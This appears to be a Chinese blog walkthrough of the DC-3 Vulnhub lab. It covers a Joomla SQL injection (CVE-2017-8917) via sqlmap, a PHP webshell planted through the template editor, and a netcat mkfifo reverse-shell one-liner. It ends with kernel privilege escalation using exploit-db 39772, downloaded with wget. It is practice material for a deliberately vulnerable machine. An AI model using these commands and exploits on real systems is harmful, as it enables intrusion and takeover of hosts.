前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulnhnb刷题-DC-3

Vulnhnb刷题-DC-3

作者头像
C3ting
发布2023-12-26 18:32:59
1230
发布2023-12-26 18:32:59
举报
文章被收录于专栏:C3tingC3ting

Vulnhnb刷题-DC-3

打开后

image-20230604181720778
image-20230604181720778
信息收集
image-20230604182231226
image-20230604182231226
image-20230604182304959
image-20230604182304959
image-20230604183123417
image-20230604183123417
image-20230604182406363
image-20230604182406363

通过goby查到后台框架有一个漏洞,那就直接利用进入后台

利用过程

vulhub/joomla/CVE-2017-8917 at master · vulhub/vulhub · GitHub

或者使用kali自带的搜索相关exp

image-20230604184106980
image-20230604184106980
image-20230604184048510
image-20230604184048510

直接给出sqlmap的利用的命令,复制干就完了(记得改目标IP地址)

image-20230604184602570
image-20230604184602570
image-20230604184731220
image-20230604184731220

sqlmap 查库 把管理员用户名密码拿出来

image-20230604184854109
image-20230604184854109

看到user表,看看有什么东西

image-20230604185057062
image-20230604185057062

直接复制密码去使用kali带的解密工具爆破看看

image-20230604185157424
image-20230604185157424

管理地址:http://192.168.119.150/administrator

管理员用户名:admin

管理员密码:snoopy

传马

登录后台后在【Extensions】->【Templates】中任意模板中发现可以编辑和新建文件,那就直接新建一个一句话木马

image-20230604185845645
image-20230604185845645

但是还得了解一下 joomla的目录结构要不然访问不了木马

image-20230604190010479
image-20230604190010479

后面应该就是接模板名称

最后得到木马地址:http://192.168.119.150/templates/beez3/ma.php

直接上蚁剑连上

image-20230604190104325
image-20230604190104325

反弹一个shell给kali好操作(也可以不用)

kali监听8888端口

image-20230604190649167
image-20230604190649167

在蚁剑执行

代码语言:javascript
复制
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.150 8888 >/tmp/f
image-20230604190806888
image-20230604190806888

修改交互

代码语言:javascript
复制
python3 -c 'import pty;pty.spawn("/bin/bash")'
image-20230604190900303
image-20230604190900303

即可反弹shell到kali

提权

尝试内核提权

image-20230604191731639
image-20230604191731639

查询到系统为Ubuntu 16.4的版本 内核为Linux 4.4.0

image-20230604192100485
image-20230604192100485

查询可用的提权漏洞

image-20230604192257690
image-20230604192257690

经过尝试39772的这个可用,利用过程 导出查看exp

image-20230604192811752
image-20230604192811752

exp下载 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

把它复制到靶机上 直接使用python3的http.server服务,靶机使用wget即可

image-20230604193026720
image-20230604193026720
image-20230604193143898
image-20230604193143898
代码语言:javascript
复制
//解压文件夹
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
//依次执行
./compile.sh
./doubleput

等待一会即可提权成功

image-20230604193546769
image-20230604193546769
image-20230604193619397
image-20230604193619397

拿下!

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Vulnhnb刷题-DC-3
    • 信息收集
      • 利用过程
        • 传马
          • 提权
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档